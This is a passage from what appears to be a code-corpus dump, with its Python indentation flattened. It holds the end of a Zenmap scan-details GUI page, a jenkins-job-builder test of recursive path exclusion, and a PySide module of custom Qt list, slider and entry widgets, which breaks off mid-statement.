self.command_table.attach(self.info_nmap_version_label,1,2,1,2)
self.command_table.attach(self.verbose_label,0,1,2,3)
self.command_table.attach(self.info_verbose_label,1,2,2,3)
self.command_table.attach(self.debug_label,0,1,3,4)
self.command_table.attach(self.info_debug_label,1,2,3,4)
self.command_expander.add(self.command_hbox)
self._pack_noexpand_nofill(self.command_expander)
self.command_expander.set_expanded(True)
# General info:
self.start_label = HIGEntryLabel(_('Started on:'))
self.info_start_label = HIGEntryLabel(na)
self.finished_label = HIGEntryLabel(_('Finished on:'))
self.info_finished_label = HIGEntryLabel(na)
self.host_up_label = HIGEntryLabel(_('Hosts up:'))
self.info_hosts_up_label = HIGEntryLabel(na)
self.host_down_label = HIGEntryLabel(_('Hosts down:'))
self.info_hosts_down_label = HIGEntryLabel(na)
self.host_scanned_label = HIGEntryLabel(_('Hosts scanned:'))
self.info_hosts_scanned_label = HIGEntryLabel(na)
self.open_label = HIGEntryLabel(_('Open ports:'))
self.info_open_label = HIGEntryLabel(na)
self.filtered_label = HIGEntryLabel(_('Filtered ports:'))
self.info_filtered_label = HIGEntryLabel(na)
self.closed_label = HIGEntryLabel(_('Closed ports:'))
self.info_closed_label = HIGEntryLabel(na)
self.general_expander = gtk.Expander("<b>"+_("General Info")+"</b>")
self.general_expander.set_use_markup(True)
self.general_table = HIGTable()
self.general_table.set_border_width(5)
self.general_table.set_row_spacings(6)
self.general_table.set_col_spacings(6)
self.general_hbox = HIGHBox()
self.general_hbox._pack_noexpand_nofill(hig_box_space_holder())
self.general_hbox._pack_noexpand_nofill(self.general_table)
self.general_table.attach(self.start_label,0,1,0,1)
self.general_table.attach(self.info_start_label,1,2,0,1)
self.general_table.attach(self.finished_label,0,1,1,2)
self.general_table.attach(self.info_finished_label,1,2,1,2)
self.general_table.attach(self.host_up_label,0,1,2,3)
self.general_table.attach(self.info_hosts_up_label,1,2,2,3)
self.general_table.attach(self.host_down_label,0,1,3,4)
self.general_table.attach(self.info_hosts_down_label,1,2,3,4)
self.general_table.attach(self.host_scanned_label,0,1,4,5)
self.general_table.attach(self.info_hosts_scanned_label,1,2,4,5)
self.general_table.attach(self.open_label,0,1,5,6)
self.general_table.attach(self.info_open_label,1,2,5,6)
self.general_table.attach(self.filtered_label,0,1,6,7)
self.general_table.attach(self.info_filtered_label,1,2,6,7)
self.general_table.attach(self.closed_label,0,1,7,8)
self.general_table.attach(self.info_closed_label,1,2,7,8)
self.general_expander.add(self.general_hbox)
self._pack_noexpand_nofill(self.general_expander)
self.general_expander.set_expanded(True)
self._set_from_scan(scan)
def _set_from_scan(self, scan):
"""Initialize the display from a parsed scan."""
# Command info.
self.info_command_label.set_text(scan.get_nmap_command())
self.info_nmap_version_label.set_text(scan.get_scanner_version())
self.info_verbose_label.set_text(scan.get_verbose_level())
self.info_debug_label.set_text(scan.get_debugging_level())
# General info.
self.info_start_label.set_text(scan.get_formatted_date())
self.info_finished_label.set_text(scan.get_formatted_finish_date())
self.info_hosts_up_label.set_text(str(scan.get_hosts_up()))
self.info_hosts_down_label.set_text(str(scan.get_hosts_down()))
self.info_hosts_scanned_label.set_text(str(scan.get_hosts_scanned()))
self.info_open_label.set_text(str(scan.get_open_ports()))
self.info_filtered_label.set_text(str(scan.get_filtered_ports()))
self.info_closed_label.set_text(str(scan.get_closed_ports()))
for scaninfo in scan.get_scaninfo():
exp = gtk.Expander('<b>%s - %s</b>' % (_('Scan Info'), scaninfo['type'].capitalize()))
exp.set_use_markup(True)
display = self.make_scaninfo_display(scaninfo)
exp.add(display)
self._pack_noexpand_nofill(exp)
def make_scaninfo_display(self, scaninfo):
"""Return a widget displaying a scan's "scaninfo" information: type,
protocol, number of scanned ports, and list of services."""
hbox = HIGHBox()
table = HIGTable()
table.set_border_width(5)
table.set_row_spacings(6)
table.set_col_spacings(6)
table.attach(HIGEntryLabel(_('Scan type:')),0,1,0,1)
table.attach(HIGEntryLabel(scaninfo['type']),1,2,0,1)
table.attach(HIGEntryLabel(_('Protocol:')),0,1,1,2)
table.attach(HIGEntryLabel(scaninfo['protocol']),1,2,1,2)
table.attach(HIGEntryLabel(_('# scanned ports:')),0,1,2,3)
table.attach(HIGEntryLabel(scaninfo['numservices']),1,2,2,3)
table.attach(HIGEntryLabel(_('Services:')),0,1,3,4)
table.attach(self.make_services_display(scaninfo['services']),1,2,3,4)
hbox._pack_noexpand_nofill(hig_box_space_holder())
hbox._pack_noexpand_nofill(table)
return hbox
def make_services_display(self, services):
"""Return a widget displaying a list of services like
1-1027,1029-1033,1040,1043,1050,1058-1059,1067-1068,1076,1080"""
combo = gtk.combo_box_new_text()
for i in services.split(","):
combo.append_text(i)
return combo
if __name__ == "__main__":
import sys
from zenmapCore.NmapParser import NmapParser
filename = sys.argv[1]
parsed = NmapParser()
parsed.parse_file(filename)
run_details = ScanRunDetailsPage(parsed)
window = gtk.Window()
window.add(run_details)
window.connect("delete-event", lambda *args: gtk.main_quit())
window.show_all()
gtk.main()
|
gpl-2.0
| 135,565,421,673,264,290
| 52.172414
| 98
| 0.598161
| false
| 3.841033
| false
| false
| false
|
joostvdg/jenkins-job-builder
|
tests/cmd/test_recurse_path.py
|
1
|
4946
|
import os
from tests.base import mock
import testtools
from jenkins_jobs import utils
def fake_os_walk(paths):
"""Helper function for mocking os.walk() where must test that manipulation
of the returned dirs variable works as expected
"""
paths_dict = dict(paths)
def os_walk(top, topdown=True):
dirs, nondirs = paths_dict[top]
yield top, dirs, nondirs
for name in dirs:
# hard code use of '/' to ensure the test data can be defined as
# simple strings otherwise tests using this helper will break on
# platforms where os.path.sep is different.
new_path = "/".join([top, name])
for x in os_walk(new_path, topdown):
yield x
return os_walk
# Testing the utils module can sometimes result in the CacheStorage class
# attempting to create the cache directory multiple times as the tests
# are run in parallel. Stub out the CacheStorage to ensure that each
# test can safely create the object without effect.
@mock.patch('jenkins_jobs.builder.CacheStorage', mock.MagicMock)
class CmdRecursePath(testtools.TestCase):
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_pattern(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using pattern
excludes.
testing paths
/jjb_configs/dir1/test1/
/jjb_configs/dir1/file
/jjb_configs/dir2/test2/
/jjb_configs/dir3/bar/
/jjb_configs/test3/bar/
/jjb_configs/test3/baz/
"""
os_walk_paths = [
('/jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('/jjb_configs/dir1', (['test1'], ('file'))),
('/jjb_configs/dir2', (['test2'], ())),
('/jjb_configs/dir3', (['bar'], ())),
('/jjb_configs/dir3/bar', ([], ())),
('/jjb_configs/test3/bar', None),
('/jjb_configs/test3/baz', None)
]
paths = [k for k, v in os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(os_walk_paths)
self.assertEqual(paths, utils.recurse_path('/jjb_configs', ['test*']))
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_absolute(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using absolute
excludes.
testing paths
/jjb_configs/dir1/test1/
/jjb_configs/dir1/file
/jjb_configs/dir2/test2/
/jjb_configs/dir3/bar/
/jjb_configs/test3/bar/
/jjb_configs/test3/baz/
"""
os_walk_paths = [
('/jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('/jjb_configs/dir1', None),
('/jjb_configs/dir2', (['test2'], ())),
('/jjb_configs/dir3', (['bar'], ())),
('/jjb_configs/test3', (['bar', 'baz'], ())),
('/jjb_configs/dir2/test2', ([], ())),
('/jjb_configs/dir3/bar', ([], ())),
('/jjb_configs/test3/bar', ([], ())),
('/jjb_configs/test3/baz', ([], ()))
]
paths = [k for k, v in os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(os_walk_paths)
self.assertEqual(paths, utils.recurse_path('/jjb_configs',
['/jjb_configs/dir1']))
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_relative(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using relative
excludes.
testing paths
./jjb_configs/dir1/test/
./jjb_configs/dir1/file
./jjb_configs/dir2/test/
./jjb_configs/dir3/bar/
./jjb_configs/test3/bar/
./jjb_configs/test3/baz/
"""
os_walk_paths = [
('jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('jjb_configs/dir1', (['test'], ('file'))),
('jjb_configs/dir2', (['test2'], ())),
('jjb_configs/dir3', (['bar'], ())),
('jjb_configs/test3', (['bar', 'baz'], ())),
('jjb_configs/dir1/test', ([], ())),
('jjb_configs/dir2/test2', ([], ())),
('jjb_configs/dir3/bar', ([], ())),
('jjb_configs/test3/bar', None),
('jjb_configs/test3/baz', ([], ()))
]
rel_os_walk_paths = [
(os.path.abspath(
os.path.join(os.path.curdir, k)), v) for k, v in os_walk_paths]
paths = [k for k, v in rel_os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(rel_os_walk_paths)
self.assertEqual(paths, utils.recurse_path('jjb_configs',
['jjb_configs/test3/bar']))
|
apache-2.0
| -2,137,185,602,599,578,600
| 35.367647
| 79
| 0.531945
| false
| 3.586657
| true
| false
| false
|
davidsoncolin/IMS
|
UI/QCore.py
|
1
|
53288
|
#!/usr/bin/env python
import functools
import numpy as np
from PySide import QtCore, QtGui
from GCore import State
from UI import createAction
import weakref
class QListWidget(QtGui.QListView):
item_selected = QtCore.Signal(int)
focus_changed = QtCore.Signal(bool)
item_renamed = QtCore.Signal(str, str)
data_changed = QtCore.Signal(dict)
def __init__(self, items=[], parent=None, renameEnabled=False):
super(QListWidget, self).__init__(parent)
self.item_count = 0
self.renameEnabled = renameEnabled
self.overrideSelection = None
self.selectedItem = None
self.item_list_model = None
self.item_selection_model = None
self.setDragEnabled(True)
self.setDragDropOverwriteMode(False)
self.setDragDropMode(QtGui.QAbstractItemView.InternalMove)
self.createWidgets()
for item in items:
self.addItem(item)
def count(self):
return self.item_count
def createWidgets(self):
self.item_list_model = QtGui.QStandardItemModel(self)
self.item_list_model.setSortRole(QtCore.Qt.DisplayRole)
self.item_list_model.dataChanged.connect(self.handleDataChange)
self.setModel(self.item_list_model)
self.item_selection_model = self.selectionModel()
self.item_selection_model.selectionChanged.connect(self.handleItemSelect)
self.setMinimumHeight(60)
self.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred))
def handleDataChange(self, *args):
print ("Data Change: {}".format(args))
self.overrideSelection = args[0].row()
newText = self.getItem(args[0].row(), QtCore.Qt.DisplayRole)
if newText != self.selectedItem:
self.item_renamed.emit(self.selectedItem, newText)
self.selectedItem = newText
else:
self.data_changed.emit({})
def focusInEvent(self, *args):
self.focus_changed.emit(True)
def focusOutEvent(self, *args):
self.focus_changed.emit(False)
def handleItemSelect(self, *args):
if self.overrideSelection is not None:
self.setUserSelection(self.overrideSelection)
self.overrideSelection = None
return
try:
self.selectedItem = self.getItem(self.getSelection(), QtCore.Qt.DisplayRole)
print ("Selected: {}".format(self.selectedItem))
self.item_selected.emit(self.getSelection())
except AttributeError:
pass
def getSelection(self):
try:
selection = self.item_selection_model.selection().indexes()[0].row()
except IndexError:
selection = -1
return selection
def removeItem(self, index):
self.item_list_model.takeRow(index)
self.item_count -= 1
def clear(self):
while self.item_count:
self.removeItem(0)
def addItem(self, mitem, data='', index=None):
item = QtGui.QStandardItem()
item.setData(mitem, QtCore.Qt.DisplayRole)
item.setData(data, QtCore.Qt.UserRole)
item.setEditable(self.renameEnabled)
item.setDropEnabled(False)
# Can be used to store data linked to the name
# item.setData(customData, QtCore.Qt.UserRole)
if index is None:
self.item_list_model.appendRow(item)
else:
self.item_list_model.insertRow(index, item)
self.item_count += 1
def addItems(self, items):
for item in items:
self.addItem(item)
def setUserSelection(self, index):
if self.item_count > 0:
self.setCurrentIndex(self.item_list_model.item(index).index())
self.selectedItem = self.getItem(index, QtCore.Qt.DisplayRole)
def getItems(self, role=None):
if role is None:
return [self.item_list_model.item(i) for i in xrange(0, self.item_count)]
else:
return [self.item_list_model.item(i).data(role) for i in xrange(0, self.item_count)]
def getItem(self, index, role=None):
if role is None:
return self.item_list_model.item(index)
else:
return self.item_list_model.item(index).data(role)
class QNodeWidget(QListWidget):
def __init__(self, parent):
super(QNodeWidget, self).__init__(parent=parent)
self.cookFrom = -1
self.connect(self, QtCore.SIGNAL("doubleClicked(QModelIndex)"), self, QtCore.SLOT("ItemDoubleClicked(QModelIndex)"))
def addItem(self, mitem, data='', index=None):
super(QNodeWidget, self).addItem(mitem, data, index)
def getNodes(self):
items = self.getItems(QtCore.Qt.DisplayRole)
if self.cookFrom == -1: return items
evaluate = items[:self.cookFrom + 1]
return evaluate
def ItemDoubleClicked(self, index):
self.changeCookIndex(self.getSelection(), False)
def changeCookIndex(self, index, allowDeselect=False, flush=True):
selectedItem = self.getItem(index)
if index == self.cookFrom and allowDeselect:
self.cookFrom = -1
selectedItem.setBackground(QtGui.QColor(255, 255, 255))
else:
prevCookIndex = self.cookFrom
self.cookFrom = index
if prevCookIndex != -1:
self.getItem(prevCookIndex).setBackground(QtGui.QColor(255, 255, 255))
selectedItem.setBackground(QtGui.QColor(50, 0, 180, 150))
self.data_changed.emit({'flush': flush})
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_P:
self.changeCookIndex(self.getSelection())
class QOrderedListWidget(QtGui.QGroupBox):
''' A list widget where the order of items is important and can be
changed by the user '''
item_edit = QtCore.Signal(int, list)
def __init__(self, items=[], parent=None):
super(QOrderedListWidget, self).__init__(parent)
self.item_count = 0
self.createWidgets()
self.createMenus()
self.setTitle("Items")
for item in items:
self.addItem(item)
def createWidgets(self):
self._itemList = QtGui.QListView(self)
self.item_list_model = QtGui.QStandardItemModel(self)
self.item_list_model.setSortRole(QtCore.Qt.UserRole + 1)
self._itemList.setModel(self.item_list_model)
self.item_list_model.dataChanged.connect(self.handleDataChange)
plsm = self._itemList.selectionModel()
plsm.selectionChanged.connect(self._handleItemSelect)
self._itemList.setMinimumHeight(60)
self.toolBar = QtGui.QToolBar(self)
self.toolBar.setOrientation(QtCore.Qt.Vertical)
self._itemList.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)) # .MinimumExpanding))
layout = QtGui.QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.addWidget(self._itemList)
layout.addWidget(self.toolBar)
self.setLayout(layout)
def move(self, di=1):
""" move the selected item up (di=-1) or down (di=1). Updates the model(ui) and the
ik item order """
sm = self._itemList.selectionModel()
try:
selectedIndex = sm.selection().indexes()[0]
except IndexError: # nothing selected at all
return
order = selectedIndex.data(QtCore.Qt.UserRole + 1)
# if it will be moved out of list bounds then skip
if (order + di) < 0 or (order + di) >= self.item_count: return
# swap the two items in the list model.
self.item_list_model.item(order).setData(order + di, QtCore.Qt.UserRole + 1)
self.item_list_model.item(order + di).setData(order, QtCore.Qt.UserRole + 1)
# re-sort and notify
self.item_list_model.sort(0)
try:
selection = sm.selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def handleDataChange(self):
pass
def _handleItemSelect(self, selected, deselected):
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def setUserSelection(self, index):
if self.item_count > 0: self._itemList.setCurrentIndex(self.item_list_model.item(index).index())
def createMenus(self):
# http://standards.freedesktop.org/icon-naming-spec/icon-naming-spec-latest.html
up = createAction('Up', self, [functools.partial(self.move, -1)], 'Move item up', icon=QtGui.QIcon.fromTheme("go-up"))
down = createAction('Down', self, [functools.partial(self.move, 1)], 'Move item down', icon=QtGui.QIcon.fromTheme("go-down"))
remove = createAction('Remove', self, [functools.partial(self.removeItem)], 'Remove item', icon=QtGui.QIcon.fromTheme("edit-delete"))
self.toolBar.addAction(up)
self.toolBar.addAction(down)
self.toolBar.addAction(remove)
def removeItem(self):
sm = self._itemList.selectionModel()
try:
selected_item = sm.selection().indexes()[0]
except IndexError: # nothing selected at all
return
selected_index = selected_item.data(QtCore.Qt.UserRole + 1)
removed_row = self.item_list_model.takeRow(selected_index)
self.item_count = self.item_count - 1
for i in xrange(selected_index, self.item_count):
self.item_list_model.item(i).setData(i, QtCore.Qt.UserRole + 1)
# re-sort and notify
self.item_list_model.sort(0)
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def addItem(self, mitem, ignore=False):
item = QtGui.QStandardItem()
item.setData(mitem, QtCore.Qt.DisplayRole)
# Can be used to store data linked to the name
# item.setData(customData, QtCore.Qt.UserRole)
item.setData(self.item_count, QtCore.Qt.UserRole + 1)
self.item_list_model.appendRow(item)
self.item_count = self.item_count + 1
if not ignore:
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def getItems(self):
return [self.item_list_model.item(i).data(QtCore.Qt.DisplayRole) for i in xrange(0, self.item_count)]
class Qselect(QtGui.QComboBox):
'''Qselect is like a QComboBox, but has correct mouse wheel behaviour (only responds to wheel when it has focus).'''
def __init__(self, parent=None, options=None, default=None, cb=None):
QtGui.QComboBox.__init__(self, parent)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
if options != None:
for item in options: self.addItem(item)
if default != None:
self.setCurrentIndex(options.index(default))
self.cb = cb
self.connect(self, QtCore.SIGNAL('currentIndexChanged(int)'), self.callback)
def callback(self, val):
if self.cb != None: self.cb(self, val)
def wheelEvent(self, e):
if self.hasFocus():
QtGui.QComboBox.wheelEvent(self, e)
else:
e.ignore()
def focusInEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.WheelFocus)
QtGui.QComboBox.focusInEvent(self, e)
def focusOutEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
QtGui.QComboBox.focusOutEvent(self, e)
class Qslide(QtGui.QSlider):
'''Qslide is like a QSlider, but has correct mouse wheel behaviour (only responds to wheel when it has focus).'''
def __init__(self, orient, parent=None):
QtGui.QSlider.__init__(self, orient, parent)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
def wheelEvent(self, e):
if self.hasFocus():
QtGui.QSlider.wheelEvent(self, e)
else:
e.ignore()
def focusInEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.WheelFocus)
QtGui.QSlider.focusInEvent(self, e)
def focusOutEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
QtGui.QSlider.focusOutEvent(self, e)
class QslideLimitControl(QtGui.QGroupBox):
''' A control that contains a slider and a textbox useful for easy embedding in an app '''
# TODO handle scrollwheel and keyboard behaviour better, currently it scrolls by the slider units
# which can be very small
value_changed = QtCore.Signal(float)
def __init__(self, loval=0, hival=100, parent=None):
QtGui.QGroupBox.__init__(self, parent)
self.parent = parent
self.limits = [loval, hival]
self.digits = 2
self.valueIsAdjusting = False
self.createWidgets(loval, hival)
self.createLayout()
self.setStyleSheet("border:0;")
def createWidgets(self, loval, hival):
self.slider = Qslide(QtCore.Qt.Horizontal, self.parent)
self.value = loval
self.slider.unit = 1e-4
self.slider.setRange(min(max(-1e9, round(self.value / self.slider.unit)), 1e9), min(max(-1e9, round(hival / self.slider.unit)), 1e9))
self.slider.setValue(round(loval / self.slider.unit))
self.slider.valueChanged[int].connect(self.sliderSet)
self.display = QtGui.QLineEdit()
# self.display.setFont(QtGui.QFont('size=8em'))
self.display.setMaxLength(10)
unit = 1.0 # float(np.radians(1.0)) ### TODO
self.display.unit = unit
self.setDisplayText(self.value / unit)
self.display.editingFinished.connect(self.displaySet) # this folds the values of self and di into the callback
def createLayout(self):
layout = QtGui.QGridLayout()
layout.setColumnStretch(0, 5)
layout.setColumnStretch(1, 2)
layout.addWidget(self.slider)
layout.addWidget(self.display)
self.setLayout(layout)
def sync(self, value):
'''Update the gui to match the value; don't invoke the callback.'''
self.value = value
block = self.slider.blockSignals(True) # temporarily avoid callbacks
self.slider.setValue(round(value / self.slider.unit))
self.slider.blockSignals(block)
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
# ought to update the lo/hi text boxes too?
def setValue(self, x, unit):
'''Set the value: clamp and run the callback. Don't update the gui.'''
self.value = x * unit
mn, mx = self.limits
self.value = max(mn, self.value)
self.value = min(mx, self.value)
self.value_changed.emit(self.value)
return self.value
def setLo(self, value):
self.limits[0] = value
self.slider.setMinimum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify hi and value...
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.limits[1] = self.slider.maximum() * self.slider.unit / self.display.unit
return value
def setHi(self, value):
self.limits[1] = value
self.slider.setMaximum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify lo and value...
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.limits[0] = self.slider.minimum() * self.slider.unit / self.display.unit
return value
def sliderSet(self, x):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
self.setValue(self.slider.value(), self.slider.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.setDisplayText(self.value / self.display.unit)
except:
pass
self.valueIsAdjusting = False
def displaySet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.display.text())
self.setValue(v, self.display.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.setDisplayText(self.value / self.display.unit)
except:
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.valueIsAdjusting = False
def setDisplayText(self, value):
self.display.setText(str(round(value, self.digits)))
# POTENTIALLY DEPRECATED
class QslideLimitValue(QtGui.QGridLayout):
'''An object that wraps the layout and gui elements for a floating point value control with limits.'''
def __init__(self, name, value, loval, hival, cb, cbActor, parent=None):
QtGui.QGridLayout.__init__(self)
self.setColumnStretch(0, 1)
self.setColumnStretch(1, 5)
self.setColumnStretch(2, 2)
self.setColumnStretch(3, 1)
self.setColumnStretch(4, 1)
self.slider = Qslide(QtCore.Qt.Horizontal, parent)
self.value = value
self.slider.unit = 1e-4
self.slider.setRange(min(max(-1e9, round(loval / self.slider.unit)), 1e9), min(max(-1e9, round(hival / self.slider.unit)), 1e9))
self.slider.setValue(round(value / self.slider.unit))
self.slider.valueChanged[int].connect(self.sliderSet)
self.display = QtGui.QLineEdit()
# self.display.setFont(QtGui.QFont('size=8em'))
self.display.setMaxLength(10)
unit = 1.0 # float(np.radians(1.0)) ### TODO
self.display.unit = unit
self.display.setText(str(value / unit))
self.display.editingFinished.connect(self.displaySet) # this folds the values of self and di into the callback
self.limits = [loval, hival]
self.lo = QtGui.QLineEdit()
self.lo.setMaxLength(10)
self.lo.unit = unit
self.lo.setText(str(loval / unit))
self.lo.editingFinished.connect(self.loSet) # this folds the values of self and di into the callback
self.hi = QtGui.QLineEdit()
self.hi.setMaxLength(10)
self.hi.unit = unit
self.hi.setText(str(hival / unit))
self.hi.editingFinished.connect(self.hiSet) # this folds the values of self and di into the callback
self.name = name
self.label = QtGui.QLabel('<font size=8em>%s</font>' % name)
self.addWidget(self.label)
self.addWidget(self.slider)
self.addWidget(self.display)
self.addWidget(self.lo)
self.addWidget(self.hi)
self.cb = cb
self.cbActor = cbActor
self.valueIsAdjusting = False
def sync(self, value):
'''Update the gui to match the value; don't invoke the callback.'''
self.value = value
block = self.slider.blockSignals(True) # temporarily avoid callbacks
self.slider.setValue(round(value / self.slider.unit))
self.slider.blockSignals(block)
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
# ought to update the lo/hi text boxes too?
def setValue(self, x, unit):
'''Set the value: clamp and run the callback. Don't update the gui.'''
self.value = x * unit
mn, mx = self.limits
self.value = max(mn, self.value)
self.value = min(mx, self.value)
print ("setValue")
self.cb(self.cbActor, self.name, self.value)
return self.value
def setLo(self, x, unit):
# do validation
value = float(x) * unit
self.limits[0] = value
self.slider.setMinimum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify hi and value...
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.hi.setText(str(self.slider.maximum() * self.slider.unit / self.hi.unit))
self.limits[1] = self.slider.maximum() * self.slider.unit / self.hi.unit
return value
def setHi(self, x, unit):
# do validation
value = float(x) * unit
self.limits[1] = value
self.slider.setMaximum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify lo and value...
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.lo.setText(str(self.slider.minimum() * self.slider.unit / self.lo.unit))
self.limits[0] = self.slider.minimum() * self.slider.unit / self.lo.unit
return value
def sliderSet(self, x):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
self.setValue(self.slider.value(), self.slider.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.display.setText(str(self.value / self.display.unit))
except:
pass
self.valueIsAdjusting = False
def displaySet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.display.text())
self.setValue(v, self.display.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.display.setText(str(self.value / self.display.unit))
except:
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.valueIsAdjusting = False
def loSet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.lo.text())
value = self.setLo(v, self.lo.unit)
self.lo.setText(str(value / self.lo.unit))
except:
self.lo.setText(str(self.limits[0] / self.lo.unit))
self.valueIsAdjusting = False
def hiSet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.hi.text())
value = self.setHi(self.hi.text(), self.hi.unit)
self.hi.setText(str(value / self.hi.unit))
except:
self.hi.setText(str(self.limits[1] / self.hi.unit))
self.valueIsAdjusting = False
class QintWidget(QtGui.QLineEdit):
''' draggable spin box. ctrl+ left, middle or right button will scrub the values in the spinbox
by different amounts
'''
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QintWidget, self).__init__(parent)
# self.setDecimals(4)
# self.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
# self.setKeyboardTracking(False) # don't emit 3 times when typing 100
self.minstep = 1
self._dragging = False
self.current_value = None
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu) # no copy/paste menu to interfere with dragging
# catch the mouse events from the lineedit that is a child of the spinbox
# editor = self.findChild(QtGui.QLineEdit)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
# Add a Validator
int_validator = intValidator(self)
self.setValidator(int_validator)
self.setRange()
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = int(v) # ensure it's an int!
if self.current_value == v: return
self.current_value = v
self.setText(str(v))
# if not self._dragging:
self.valueChanged.emit(v)
# Constrains the spin box to between two values
def setRange(self, min=None, max=None):
try:
self.validator().setRange(min,max)
# print "Valid from {} to {}".format(str(self.validator().bottom()), str(self.validator().top()))
except:
print ("Inputs to QintWidget.setRange() are invalid with values {} and {}".format(min, max))
# Allows the box to be locked or unlocked
# Defaults to true so foo.setLocked() would lock "foo"
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return int(self.text())
def text(self):
ret = super(QintWidget, self).text()
return ret
def eventFilter(self, obj, event):
if event.type() == QtGui.QMouseEvent.MouseButtonPress:
if not event.modifiers() & QtCore.Qt.ControlModifier:
return False
self.gpx, self.gpy = event.globalX(), event.globalY()
self.startX, self.startY = event.x(), event.y()
if event.button() & QtCore.Qt.LeftButton:
self._dragging = self.minstep
if event.button() & QtCore.Qt.MiddleButton:
self._dragging = self.minstep * 100
if event.button() & QtCore.Qt.RightButton:
self._dragging = self.minstep * 10000
return True
elif event.type() == QtGui.QMouseEvent.MouseButtonRelease:
if self._dragging is not False:
self._dragging = False
self.setValue(self.text())
else:
self._dragging = False
return True
elif event.type() == QtGui.QMouseEvent.MouseMove:
if self._dragging:
if not self.isReadOnly():
newValue = (self.value() + (event.x() - self.startX) * self._dragging)
if self.validator().bottom() is not None or self.validator().top() is not None:
newValue = np.clip(newValue, self.validator().bottom(), self.validator().top())
self.setValue(newValue)
QtGui.QCursor.setPos(self.gpx, self.gpy)
return True
return False
class QLineWidget(QtGui.QLineEdit):
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QLineWidget, self).__init__(parent)
self._dragging = False
self.current_value = None
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = str(v)
if self.current_value == v: return
self.current_value = v
self.setText(v)
self.valueChanged.emit(v)
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return self.text()
def text(self):
ret = super(QLineWidget, self).text()
return ret
class QTextWidget(QtGui.QTextEdit):
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QTextWidget, self).__init__(parent)
self.setTabChangesFocus(True)
self.current_value = None
self.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.resultHighlighter = PythonHighlighter(self)
def focusOutEvent(self, event):
super(QTextWidget, self).focusOutEvent(event)
self.setValue(self.toPlainText())
def setValue(self, v):
v = str(v)
if self.current_value == v: return
self.current_value = v
self.setText(v)
self.valueChanged.emit(v)
def value(self):
return self.value()
class QCommandEntryWidget(QtGui.QTextEdit):
def __init__(self, *args):
QtGui.QTextEdit.__init__(self, *args)
self.setAcceptRichText(False)
def keyPressEvent(self, keyEvent):
if (
(keyEvent.key() == QtCore.Qt.Key_Enter) or
(keyEvent.key() == QtCore.Qt.Key_Return and
